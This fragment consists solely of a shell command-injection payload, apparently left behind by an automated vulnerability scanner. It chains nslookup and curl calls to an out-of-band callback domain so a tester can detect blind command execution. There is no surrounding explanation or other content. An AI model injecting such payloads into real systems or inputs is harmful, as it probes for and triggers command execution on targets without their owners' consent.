(nslookup -q=cname hithvqzdlncqt6f76e.bxss.me||curl hithvqzdlncqt6f76e.bxss.me))

  • :